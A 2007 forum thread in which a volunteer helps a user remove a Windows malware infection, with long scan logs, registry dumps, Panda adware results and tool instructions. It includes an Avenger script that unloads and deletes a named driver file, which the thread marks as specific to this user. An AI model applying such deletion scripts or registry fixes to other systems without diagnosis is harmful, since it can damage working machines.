2007-03-08 19:33:08 5074 --a------ C:\Documents and Settings\Duane\NTPBack.exe
2007-03-08 19:33:08 42887 --a------ C:\Documents and Settings\Duane\ntp.exe
2007-03-08 19:33:08 26112 --a------ C:\Documents and Settings\Duane\nircmd.exe
2007-03-08 19:33:08 38400 --a------ C:\Documents and Settings\Duane\moveex.exe
2007-03-08 19:33:08 2304 --a------ C:\Documents and Settings\Duane\Look2Me.bat
2007-03-08 19:33:08 117379 --a------ C:\Documents and Settings\Duane\LIST-C.bat
2007-03-08 19:33:08 181776 --a------ C:\Documents and Settings\Duane\handle.exe
2007-03-08 19:33:08 73728 --a------ C:\Documents and Settings\Duane\FDSV.EXE
2007-03-08 19:33:08 51200 --a------ C:\Documents and Settings\Duane\dumphive.exe
2007-03-08 19:33:08 319415 --a------ C:\Documents and Settings\Duane\Creg.reg
2007-03-08 19:33:08 28672 --a------ C:\Documents and Settings\Duane\catchme.exe
2007-02-24 21:33:14 53248 --a------ C:\WINDOWS\System32\Process.exe
2007-02-24 21:33:08 0 d-------- C:\SmitfraudFix<SMITFR~1>
2007-02-24 10:28:21 19392 --a------ C:\WINDOWS\System32\drivers\avgmfx86.sys
2007-02-24 10:28:21 3968 --a------ C:\WINDOWS\System32\drivers\avgclean.sys
2007-02-21 21:42:30 129 --a------ C:\fix.bat
2007-02-20 23:22:43 0 d-------- C:\Program Files\backups

-- Find3M Report ---------------------------------------------------------------

2007-03-19 21:58:43 0 d-------- C:\Program Files\Hijack This<HIJACK~1>
2007-03-19 21:57:46 0 d-------- C:\Program Files\Mozilla Firefox<MOZILL~1>
2007-03-18 10:52:10 0 d-------- C:\Program Files\Picasa2
2007-03-18 10:50:23 0 d-------- C:\Program Files\Messenger<MESSEN~1>
2007-03-18 10:45:17 0 d-------- C:\Program Files\iTunes
2007-03-18 10:44:01 0 d-------- C:\Program Files\Google
2007-03-18 10:41:36 0 d-------- C:\Program Files\BigFix
2007-03-08 19:47:09 0 d-------- C:\Program Files\Common Files\Symantec Shared<SYMANT~1>
2007-02-25 10:48:59 0 d---s---- C:\Documents and Settings\Duane\Application Data\Microsoft<MICROS~1>
2007-02-24 22:08:44 3762 --a------ C:\WINDOWS\System32\tmp.reg
2007-02-24 10:40:37 0 d-------- C:\Documents and Settings\Duane\Application Data\AVG7
2007-02-24 10:28:12 0 d-------- C:\Program Files\Grisoft
2007-02-20 21:14:12 0 d-------- C:\Program Files\Shockwave.com<SHOCKW~1.COM>
2007-02-13 21:29:11 0 d-------- C:\Program Files\Common Files\Sandlot Shared<SANDLO~1>
2007-02-10 20:00:13 14201 --a------ C:\Program Files\hijackthis.log<HIJACK~1.LOG>
2007-01-28 22:13:42 0 d-------- C:\Program Files\LG Software Innovations<LGSOFT~1>
2007-01-28 22:05:20 0 d-------- C:\Program Files\CloneDVD
2007-01-28 21:28:17 14 --a------ C:\WINDOWS\System32\systeminfo3.dll<SYSTEM~1.DLL>
2007-01-28 21:26:56 0 d-------- C:\Documents and Settings\Duane\Application Data\Vso
2007-01-28 21:26:55 34 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.log
2007-01-28 21:26:41 47360 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.sys
2007-01-28 21:26:41 1144 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.inf
2007-01-28 21:26:41 7176 --a------ C:\Documents and Settings\Duane\Application Data\pcouffin.cat
2007-01-28 21:26:41 81920 --a------ C:\Documents and Settings\Duane\Application Data\ezpinst.exe
2007-01-21 15:19:32 0 d-------- C:\Documents and Settings\Duane\Application Data\Lavasoft
2007-01-21 15:19:15 0 d-------- C:\Program Files\Lavasoft
2007-01-21 15:08:15 14612 --a------ C:\Program Files\CWSHREDDER.EXE-2D092FD4.pf<CWSHRE~1.PF>
2007-01-21 15:03:52 532480 --a------ C:\Program Files\cwshredder.exe<CWSHRE~1.EXE>
2007-01-12 18:19:57 0 --a------ C:\WINDOWS\System32\vb2en16.dll
2007-01-11 16:35:33 12800 --a------ C:\WINDOWS\System32\svchost.exe
2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\ps.dat
2007-01-07 18:21:40 1 --a------ C:\WINDOWS\System32\cookie.dat
2007-01-07 13:16:52 25600 --a------ C:\WINDOWS\System32\helper.dll
2007-01-04 22:35:41 10660 --a------ C:\WINDOWS\mozver.dat
2007-01-03 20:49:11 5037072 --a------ C:\Program Files\spybotsd14.exe<SPYBOT~1.EXE>
2007-01-01 12:02:40 507 --a------ C:\WINDOWS\EReg077.dat
2006-12-25 16:33:11 23066 --a------ C:\Program Files\plainoldfavorites-0.5.6-fx-windows.xpi<PLAINO~1.XPI>

-- Registry Dump ---------------------------------------------------------------

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"Microsoft Works Update Detection"="c:\\Program Files\\Microsoft Works\\WkDetect.exe"
"swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.1128.5462\\GoogleToolbarNotifier.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot"
"SSC_UserPrompt"="C:\\Program Files\\Common Files\\Symantec Shared\\Security Center\\UsrPrmpt.exe"
"Ulead AutoDetector"="C:\\Program Files\\Ulead Systems\\Ulead Photo Explorer 8.0 SE Basic\\Monitor.exe"
"HPDJ Taskbar Utility"="C:\\WINDOWS\\System32\\spool\\drivers\\w32x86\\3\\hpztsb10.exe"
"HP Component Manager"="\"C:\\Program Files\\HP\\hpcoretech\\hpcmpmgr.exe\""
"HP Software Update"="\"C:\\Program Files\\Hewlett-Packard\\HP Software Update\\HPWuSchd2.exe\""
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"Picasa Media Detector"="C:\\Program Files\\Picasa2\\PicasaMediaDetector.exe"
"iTunesHelper"="\"C:\\Program Files\\iTunes\\iTunesHelper.exe\""
"AVG7_CC"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgcc.exe /STARTUP"
"OFFICEKB"="C:\\Program Files\\Micro Innovations\\Keyboard\\kbdap32a.EXE"
"FLMOFFICE4DMOUSE"="C:\\Program Files\\Micro Innovations\\Mouse\\mouse32a.exe"
"PC Pitstop Optimize Scheduler"="C:\\Program Files\\PCPitstop\\Optimize\\PCPOptimize.exe -boot"
"SmcService"="C:\\PROGRA~1\\Sygate\\SPF\\smc.exe -startgui"
"SunJavaUpdateSched"="\"C:\\Program Files\\Java\\jre1.6.0\\bin\\jusched.exe\""

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5"

[HKEY_USERS\.default\software\microsoft\windows\currentversion\run]
"AVG7_Run"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgw.exe /RUNONCE"

[HKEY_USERS\s-1-5-18\software\microsoft\windows\currentversion\run]
"AVG7_Run"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgw.exe /RUNONCE"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost]
LocalService REG_MULTI_SZ Alerter\0WebClient\0LmHosts\0RemoteRegistry\0upnphost\0SSDPSRV\0\0
NetworkService REG_MULTI_SZ DnsCache\0\0
rpcss REG_MULTI_SZ RpcSs\0\0
imgsvc REG_MULTI_SZ StiSvc\0\0
termsvcs REG_MULTI_SZ TermService\0\0

-- End of ComboScan: finished at 2007-03-19 at 22:02:00 ------------------------

Ried · 03-19-2007, 11:20 PM

Hi,

It's still there--it keeps changing names on us. We need to find the spawning entry.

Let's see if this tool will provide us more info:

Please download SREng.

**You may receive a message "The bandwidth limit for this site has been exceeded", please keep trying--eventually you'll get through.

1. Extract it to Desktop & double click SREng.exe to run it

2. Select 'Smart Scan' & tick "Verify Digital Signatures"

3. Click on the [Scan] button

4. When finished, click on the [Save Reports] button & save the log to Desktop

5. Attach the log in your next reply. Dont post it.

You may have to rename SREngLOG.log to SREngLOG.txt to upload it.

--------------------------------------------------------

It's after 1am my time, so I'll have to pick this up again tomorrow afternoon. Go ahead and shut your machine down when you're through.

cul8rman · 03-20-2007, 07:15 AM

Here is the latest log file, attached.

I have left the system up. IE will not load so hopefully we do not need a Pandascan until I can restart the system, It should work then.

Thanks a lot.

cul8rman · 03-20-2007, 07:17 AM

it did not upload as .log, here is .txt.

Ried · 03-20-2007, 10:32 AM

I hope you still have Avenger on your desktop.

Launch Avenger and copy all the text contained in the code box below to your Clipboard by highlighting it and pressing (Ctrl+C):

Quote:

Drivers to unload:

C:\WINDOWS\System32\ntio256.sys

Files to delete:

C:\WINDOWS\System32\ntio256.sys

Note: the above code was created specifically for this user. If you are not this user, do NOT follow these directions as they could damage the workings of your system.

Now, start The Avenger program by clicking on its icon on your desktop.

Under "Script file to execute" choose "Input Script Manually".
Now click on the Magnifying Glass icon which will open a new window titled "View/edit script"
Paste the text copied to clipboard into this window by pressing (Ctrl+V).
Click Done
Now click on the Green Light to begin execution of the script
Answer "Yes" twice when prompted.

4. The Avenger will automatically do the following:

It will Restart your computer. ( In cases where the code to execute contains "Drivers to Unload", The Avenger will actually restart your system twice.)
On reboot, it will briefly open a black command window on your desktop, this is normal.
After the restart, it creates a log file that should open with the results of Avenger’s actions. This log file will be located at C:\avenger.txt
The Avenger will also have backed up all the files, etc., that you asked it to delete, and will have zipped them and moved the zip archives to C:\avenger\backup.zip.

5. Please copy/paste the content of c:\avenger.txt into your reply.

-----------------------------------------------------

Restart your system into Safe Mode and run SDFix once again.

-----------------------------------------------------

Run ComboFix.exe

-----------------------------------------------------

Please include the following in your next reply:

c:\avenger.txt
C:\SDFix\Report.txt
ComboFix.txt

How is your system behaving now?

cul8rman · 03-20-2007, 10:46 PM

Color is back so I have separated the posts with a color line of the process run.

Avenger.txt file

Logfile of The Avenger version 1, by Swandog46
Running from registry key:
\Registry\Machine\System\CurrentControlSet\Services\tkxembmv

*******************

Script file located at: \??\C:\Program Files\lerfqbyh.txt
Script file opened successfully.

Script file read successfully

Backups directory opened successfully at C:\Avenger

*******************

Beginning to process script file:

Registry key \Registry\Machine\System\CurrentControlSet\Services\C:\WINDOWS\System32\ntio256.sys not found!
Unload of driver C:\WINDOWS\System32\ntio256.sys failed!

Could not process line:
C:\WINDOWS\System32\ntio256.sys
Status: 0xc0000034

File C:\WINDOWS\System32\ntio256.sys not found!
Deletion of file C:\WINDOWS\System32\ntio256.sys failed!

Could not process line:
C:\WINDOWS\System32\ntio256.sys
Status: 0xc0000034

Completed script processing.

*******************

Finished! Terminate.

- - - - - - - - - - - - - - - -

Results of Report.txt

SDFix: Version 1.69

Run by Duane - Tue 03/20/2007 @ 20:25:26.98

Microsoft Windows XP [Version 5.1.2600]

Running From: C:\Documents and Settings\Duane\Desktop\SDFix

Safe Mode:
Checking Services:

Restoring Windows Registry Entries
Restoring Default Hosts File

Rebooting...

Normal Mode:
Checking Files:

Below files will be copied to Backups folder then removed:

C:\WINDOWS\system32\i - Deleted
C:\WINDOWS\system32\setup_63032.exe - Deleted

ADS Check:

C:\WINDOWS\system32
No streams found.

Final Check:

Remaining Services:
------------------

Authorized Application Key Export:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"="%windir%\\system32\\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"

Remaining Files:
---------------

Backups Folder: - C:\DOCUME~1\Duane\Desktop\SDFix\backups\backups.zip

Checking For Files with Hidden Attributes :

C:\Program Files\Common Files\aolshare\shell\us\shellext.dll
C:\Program Files\Common Files\csshare\shell\us\shellext.dll
C:\My Games\Action Ball\actionball.exe
C:\My Games\Adventure Ball\AdventureBall.exe
C:\My Games\Aqua Pearls\pearls.exe
C:\My Games\Cactus Bruce and the Corporate Monkeys\RealCB12.exe
C:\My Games\Clash 'N Slash\Clash N Slash.exe
C:\My Games\Flying Leo\FlyingLeo.exe
C:\My Games\Icy Spell\IcySpell.exe
C:\My Games\Impact\Impact.exe
C:\My Games\Inspheration\Inspheration.exe
C:\My Games\Jewel of Atlantis\Jewel of Atlantis.exe
C:\My Games\Mirror Magic\mirrormagic.exe
C:\My Games\Mosaic - Tomb of Mystery\Mosaic.exe
C:\My Games\Phlinx to Go\PhlinxToGo.exe
C:\My Games\Rainbow Web\RainbowWeb.exe
C:\My Games\Snowy - Space Trip\SpaceTrip.exe
C:\My Games\Turtle Odyssey\Game.exe
C:\My Games\Wheel of Fortune\Wheel of Fortune.exe
C:\Program Files\America Online 8.0\aolphx.exe
C:\Program Files\America Online 8.0\aoltray.exe
C:\Program Files\America Online 8.0\RBM.exe
C:\Program Files\America Online 8.0\waol.exe
C:\Program Files\America Online 8.0\COMIT\cswitch.exe
C:\Program Files\CompuServe 7.0\csphx.exe
C:\Program Files\CompuServe 7.0\cstray.exe
C:\Program Files\CompuServe 7.0\RBM.exe
C:\Program Files\CompuServe 7.0\wcs2000.exe
C:\Program Files\CompuServe 7.0\COMIT\cswitch.exe
C:\Program Files\Picasa2\setup.exe
C:\WINDOWS\system32\config\system.tmp.LOG

Add/Remove Programs List:

1Click DVD Copy 4.2.9.2
3D Snowy Cottage Screen Saver
Ad-Aware SE Personal
Adobe Acrobat 4.0
Agfa ePhoto CL18 Digital Camera Driver
America Online
AOL Instant Messenger (SM)
AOL Coach Version 1.0(Build:20020823.1)
AVG 7.5
AVG Anti-Spyware 7.5
BadCopy Pro
Belarc Advisor 7.0
BigFix
Calm Before the Storm Screen Saver
Chess Live 4.2
Cinema Tycoon(TM) Gold
CleanUp!
Conexant SoftK56 Modem(M)
CompuServe
Codec Pack - All In 1 6.0.2.7
Cox Online Support Controls
EPSON Printer Software
EZBack-it-up 2.0.1
Fiber Twig 2: Restoration of Magic Garden
Fish Tycoon
Fortune Tiles(TM) Gold
FREE Hi-Q Recorder 1.9
Gem Shop
Google Desktop Search
Gum Droppers
Hexalot
High Flying Act - Interactive Storybook
HijackThis 1.99.1
ICQ
iTunes
Karu
Microsoft Data Access Components KB870669
Lavasoft VX2 Cleaner
LEGO Chess
Macromedia Shockwave Player
CloneDVD 4.0
Micro Innovations Wireless Keyboard
Micro Innovations Wireless Optical Mouse
Mozilla Firefox (2.0.0.3)
MSN Music Assistant
Netscape 6 (6.2.1)
Panda ActiveScan
PC Pitstop Optimize 1.5
Picasa 2
QuickTime
Reader Rabbit 1st Grade
Reader Rabbit 1st Grade(R) Capers on Cloud Nine!(TM)
Reader Rabbit Thinking Adventures Ages 4-6
Reader Rabbit(R) I Can Read! With Phonics
RealArcade
RealPlayer
RegistryFix v3.0
Reader Rabbit's 2nd Grade
Sandlot Games Client Services
Macromedia Flash Player 8
SimCity 3000
Splash
Spybot - Search & Destroy 1.4
IncBack +
SurferNETWORK Player
SyncBackSE
Viewpoint Media Player (Remove Only)
WeatherBug
Winamp (remove only)
Yahoo! Toolbar
Yahoo! Toolbar
Zulu Gems
Microsoft Money 2003
Microsoft Money 2003 System Pack
PC Inspector File Recovery
The Sims Deluxe Edition
Norton WMI Update
Google Toolbar for Internet Explorer
Java(TM) SE Runtime Environment 6
DataRobot Premium
Stomp Backup MyPC
MaxBlast 4
PowerDVD
Windows Backup Utility
EPSON Web-To-Page
Mirror Magic
NetZero For Riverdeep
iTunes
Intel(R) Extreme Graphics Driver
Microsoft Office Excel Viewer 2003
Microsoft Office Word Viewer 2003
Adobe Reader 7.0.7
DV 4100M
HP Software Update
Ulead Photo Express 4.0 SE
Texas Hold 'Em: High Stakes Poker
Ulead Photo Explorer 8.0 SE Basic
Disney's Phonics Quest
Greeting Card Factory Express
Sygate Personal Firewall
Microsoft Works 6.0
HP Deskjet 3740
Realtek AC'97 Audio
Multimedia Keyboard Driver

Finished

------------------------------------------
Results of ComboFix.txt

"Duane" - 07-03-20 21:24:36 Service Pack 1
ComboFix 07-03-15.2 - Running from: "C:\Documents and Settings\Duane\Desktop"

((((((((((((((((((((((((((((((( Files Created from 2007-02-20 to 2007-03-20 ))))))))))))))))))))))))))))))))))

2007-03-20 20:18 <DIR> d-------- C:\avenger
2007-03-19 21:14 <DIR> d--h----- C:\WINDOWS\PIF
2007-03-18 12:06 552 --a------ C:\Combo.bat
2007-03-18 09:51 77 --a------ C:\delete.reg
2007-03-18 09:40 51,955,192 --a------ C:\regedit 3.18.07.reg
2007-03-17 23:47 51,951,606 --a------ C:\Regedit 3.172.07.reg
2007-03-17 09:39 51,944,564 --a------ C:\regedit 3.17.07.reg
2007-03-13 20:51 136 --a------ C:\WINDOWS\system32\dgjun.bat
2007-03-13 19:32 51,995,858 --a------ C:\Regedit 3.13.07.reg
2007-03-12 18:20 491,768 --a------ C:\ie6setup.exe
2007-03-11 22:17 <DIR> d-------- C:\WINDOWS\system32\ActiveScan
2007-03-11 09:25 <DIR> d-------- C:\Program Files\Java
2007-03-11 09:25 <DIR> d-------- C:\Program Files\Common Files\Java
2007-03-11 09:24 <DIR> d-------- C:\DOCUME~1\Duane\APPLIC~1\Sun
2007-03-10 11:31 <DIR> d-------- C:\Rustbfix
2007-03-08 19:33 971 --a------ C:\DOCUME~1\Duane\Purity.bat
2007-03-08 19:33 8,192 --a------ C:\DOCUME~1\Duane\RestartIt.exe
2007-03-08 19:33 79,360 --a------ C:\DOCUME~1\Duane\swxcacls.exe
2007-03-08 19:33 73,728 --a------ C:\DOCUME~1\Duane\FDSV.EXE
2007-03-08 19:33 6,914 --a------ C:\DOCUME~1\Duane\Qoo.bat
2007-03-08 19:33 51,200 --a------ C:\DOCUME~1\Duane\dumphive.exe
2007-03-08 19:33 5,074 --a------ C:\DOCUME~1\Duane\NTPBack.exe
2007-03-08 19:33 49,152 --a------ C:\DOCUME~1\Duane\vfind.exe
2007-03-08 19:33 42,887 --a------ C:\DOCUME~1\Duane\ntp.exe
2007-03-08 19:33 39,184 --a------ C:\DOCUME~1\Duane\Ntrights.exe
2007-03-08 19:33 38,400 --a------ C:\DOCUME~1\Duane\moveex.exe
2007-03-08 19:33 319,415 --a------ C:\DOCUME~1\Duane\Creg.reg
2007-03-08 19:33 28,672 --a------ C:\DOCUME~1\Duane\catchme.exe
2007-03-08 19:33 26,112 --a------ C:\DOCUME~1\Duane\nircmd.exe
2007-03-08 19:33 2,304 --a------ C:\DOCUME~1\Duane\Look2Me.bat
2007-03-08 19:33 181,776 --a------ C:\DOCUME~1\Duane\handle.exe
2007-03-08 19:33 140,800 --a------ C:\DOCUME~1\Duane\swreg.exe
2007-03-08 19:33 123,904 --a------ C:\DOCUME~1\Duane\swsc.exe
2007-03-08 19:33 117,379 --a------ C:\DOCUME~1\Duane\LIST-C.bat
2007-02-24 21:33 53,248 --a------ C:\WINDOWS\system32\Process.exe
2007-02-24 21:33 <DIR> d-------- C:\SmitfraudFix
2007-02-21 21:42 129 --a------ C:\fix.bat
2007-02-20 23:22 <DIR> d-------- C:\Program Files\backups

(((((((((((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))))

2007-03-19 21:58 -------- d-------- C:\Program Files\hijack this
2007-03-18 10:52 -------- d-------- C:\Program Files\picasa2
2007-03-18 10:50 -------- d-------- C:\Program Files\messenger
2007-03-18 10:45 -------- d-------- C:\Program Files\itunes
2007-03-18 10:44 -------- d-------- C:\Program Files\google
2007-03-08 19:47 -------- d-------- C:\Program Files\Common Files\symantec shared
2007-02-24 22:08 3762 --a------ C:\WINDOWS\system32\tmp.reg
2007-02-20 21:14 -------- d-------- C:\Program Files\shockwave.com
2007-02-10 20:00 14201 --a------ C:\Program Files\hijackthis.log
2007-01-28 22:13 -------- d-------- C:\Program Files\lg software innovations
2007-01-28 22:05 -------- d-------- C:\Program Files\clonedvd
2007-01-28 21:28 14 --a------ C:\WINDOWS\system32\systeminfo3.dll
2007-01-28 21:26 81920 --a------ C:\DOCUME~1\Duane\APPLIC~1\ezpinst.exe
2007-01-28 21:26 7176 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.cat
2007-01-28 21:26 47360 --a------ C:\WINDOWS\system32\drivers\pcouffin.sys
2007-01-28 21:26 47360 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.sys
2007-01-28 21:26 34 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.log
2007-01-28 21:26 1144 --a------ C:\DOCUME~1\Duane\APPLIC~1\pcouffin.inf
2007-01-28 21:26 -------- d-------- C:\DOCUME~1\Duane\APPLIC~1\vso
2007-01-21 15:19 -------- d-------- C:\Program Files\lavasoft
2007-01-21 15:19 -------- d-------- C:\DOCUME~1\Duane\APPLIC~1\lavasoft
2007-01-21 15:08 14612 --a------ C:\Program Files\cwshredder.exe-2d092fd4.pf
2007-01-21 15:03 532480 --a------ C:\Program Files\cwshredder.exe
2007-01-12 18:19 0 --a------ C:\WINDOWS\system32\vb2en16.dll
2007-01-11 16:35 12800 --a------ C:\WINDOWS\system32\svchost.exe
2007-01-07 18:21 1 --a------ C:\WINDOWS\system32\ps.dat
2007-01-07 18:21 1 --a------ C:\WINDOWS\system32\cookie.dat
2007-01-07 13:16 25600 --a------ C:\WINDOWS\system32\helper.dll
2007-01-04 22:35 10660 --a------ C:\WINDOWS\mozver.dat
2007-01-03 20:49 5037072 --a------ C:\Program Files\spybotsd14.exe
2007-01-01 12:02 507 --a------ C:\WINDOWS\ereg077.dat
2006-12-25 16:33 23066 --a------ C:\Program Files\plainoldfavorites-0.5.6-fx-windows.xpi

(((((((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))

*Note* empty entries & legit default entries are not shown

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run]
"MSMSGS"="\"C:\\Program Files\\Messenger\\msmsgs.exe\" /background"
"Microsoft Works Update Detection"="c:\\Program Files\\Microsoft Works\\WkDetect.exe"
"swg"="C:\\Program Files\\Google\\GoogleToolbarNotifier\\1.2.1128.5462\\GoogleToolbarNotifier.exe"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run]
"TkBellExe"="\"C:\\Program Files\\Common Files\\Real\\Update_OB\\realsched.exe\" -osboot"
"SSC_UserPrompt"="C:\\Program Files\\Common Files\\Symantec Shared\\Security Center\\UsrPrmpt.exe"
"Ulead AutoDetector"="C:\\Program Files\\Ulead Systems\\Ulead Photo Explorer 8.0 SE Basic\\Monitor.exe"
"HPDJ Taskbar Utility"="C:\\WINDOWS\\System32\\spool\\drivers\\w32x86\\3\\hpztsb10.exe"
"HP Component Manager"="\"C:\\Program Files\\HP\\hpcoretech\\hpcmpmgr.exe\""
"HP Software Update"="\"C:\\Program Files\\Hewlett-Packard\\HP Software Update\\HPWuSchd2.exe\""
"QuickTime Task"="\"C:\\Program Files\\QuickTime\\qttask.exe\" -atboottime"
"Picasa Media Detector"="C:\\Program Files\\Picasa2\\PicasaMediaDetector.exe"
"iTunesHelper"="\"C:\\Program Files\\iTunes\\iTunesHelper.exe\""
"AVG7_CC"="C:\\PROGRA~1\\Grisoft\\AVG7\\avgcc.exe /STARTUP"
"OFFICEKB"="C:\\Program Files\\Micro Innovations\\Keyboard\\kbdap32a.EXE"
"FLMOFFICE4DMOUSE"="C:\\Program Files\\Micro Innovations\\Mouse\\mouse32a.exe"
"PC Pitstop Optimize Scheduler"="C:\\Program Files\\PCPitstop\\Optimize\\PCPOptimize.exe -boot"
"SmcService"="C:\\PROGRA~1\\Sygate\\SPF\\smc.exe -startgui"
"SunJavaUpdateSched"="\"C:\\Program Files\\Java\\jre1.6.0\\bin\\jusched.exe\""

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\IMAIL]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MAPI]
"Installed"="1"
"NoChange"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\OptionalComponents\MSFS]
"Installed"="1"

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shellexecutehooks]
"{57B86673-276A-48B2-BAE7-C6DBB3020EB8}"="AVG Anti-Spyware 7.5"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"="msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll"

[HKEY_LOCAL_MACHINE\software\Microsoft\Windows NT\CurrentVersion\Svchost]
LocalService REG_MULTI_SZ Alerter\0WebClient\0LmHosts\0RemoteRegistry\0upnphost\0SSDPSRV\0\0
NetworkService REG_MULTI_SZ DnsCache\0\0
rpcss REG_MULTI_SZ RpcSs\0\0
imgsvc REG_MULTI_SZ StiSvc\0\0
termsvcs REG_MULTI_SZ TermService\0\0

********************************************************************

catchme 0.2 W2K/XP/Vista - userland rootkit detector by Gmer, 17 October 2006
http://www.gmer.net

scanning hidden processes ...

scanning hidden services ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden processes: 0
hidden services: 0
hidden files: 0

********************************************************************

Completion time: 07-03-20 21:26:05
C:\ComboFix2.txt ... 07-03-18 14:48
C:\ComboFix3.txt ... 07-03-18 12:06

---------------------------------------------
I checked the C/Windows/system32 for setup_####.exe files and did not see any. I also did not see the I folder that had been present. AVG has not popped up with any threats. I have not done anything else at this point but will check IE and put that in next post.

cul8rman · 03-20-2007, 10:54 PM

IE worked fine along with saving files, I had problems before when selecting a different location in the drop down menu. IE and Firefox load quickly.

Did you beat the virus or do I need to check again with Panda?

Thanks for your hard work on this and Pancake as well.

Ried · 03-21-2007, 08:18 AM

I'm a bit leary to say we've erradicated this infection at this point. I'd like to see an online scan and wait a few reboots to see how things develop.

Perform an online scan with Internet Explorer with Panda ActiveScan

Click on located at the bottom of the page.
A "pop up" window will appear. * Please ensure that your pop up blocker doesn't block it *
Enter your e-mail address, country, and state & click "Free Online Scan" *The download of the 8 MB Panda's ActiveX control will take place*

Begin the scan by selecting

If it finds any malware, it will offer you a report.
Please ignore any entry it finds and the offer to buy the program to remove the entry, as we will address this later.
Click on then click

* You needn't remain online while it's doing the scan but you have to re-connect after it has finished to see the report.
* Turn off the real time scanner of any existing antivirus program while performing the online scan

--------------------------------------------------------

Also, since you began this thread a new tool has been developed to replace ComboScan. Delete ComboScan.exe and please download the following:

Download Deckard's System Scanner (DSS) to your Desktop.

What DSS will do:

create a new System Restore point in Windows XP and Vista.
clean your Temporary Files, Downloaded Program Files, and Internet Cache Files, and also empty the Recycle Bin on all drives.
check some important areas of your system and produce a report for your analyst to review. DSS automatically runs HijackThis for you, but it will also install and place a shortcut to HijackThis on your desktop if you do not already have HijackThis installed.

Note: You must be logged onto an account with administrator privileges.

Close all applications and windows.
Double-click on dss.exe to run it, and follow the prompts.
When the scan is complete, two text files will open - main.txt <- this one will be maximized and extra.txt <-this one will be minimized
Copy (Ctrl+A then Ctrl+C) and paste (Ctrl+V) the contents of main.txt in your thread in the HijackThis Log Help Forum.
Please attach extra.txt to your post.

To attach a file to a new post, simply

Click the[Manage Attachments] button under Additional Options > Attach Files on the post composition page, and
copy and paste the following into the "Upload File from your Computer" box:
C:\Deckard\System Scanner\extra.txt
Click Upload.

-----------------------------------------------------

Please include the following in your next reply:

Panda results
main.txt
an attached extra.txt

cul8rman · 03-21-2007, 11:23 PM

I was not so excited when I saw results of Panda, but then I do not have the expert eye you do.

Panda Results

Incident Status Location

Adware:adware/savenow Not disinfected Windows Registry
Potentially unwanted tool:application/funweb Not disinfected hkey_classes_root\FunWebProducts.DataControl.1
Adware:adware/wupd Not disinfected Windows Registry
Adware:adware/antivirus-gold Not disinfected Windows Registry
Adware:adware/easysearch Not disinfected Windows Registry
Adware:adware/adtomi Not disinfected Windows Registry
Adware:adware/browseraid Not disinfected Windows Registry
Spyware:Cookie/Advertising Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.advertising.com/]
Spyware:Cookie/Mediaplex Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.mediaplex.com/]
Spyware:Cookie/Doubleclick Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.doubleclick.net/]
Spyware:Cookie/Atlas DMT Not disinfected C:\Documents and Settings\Duane\Application Data\Mozilla\Firefox\Profiles\wchylb0m.default\cookies.txt[.atdmt.com/]
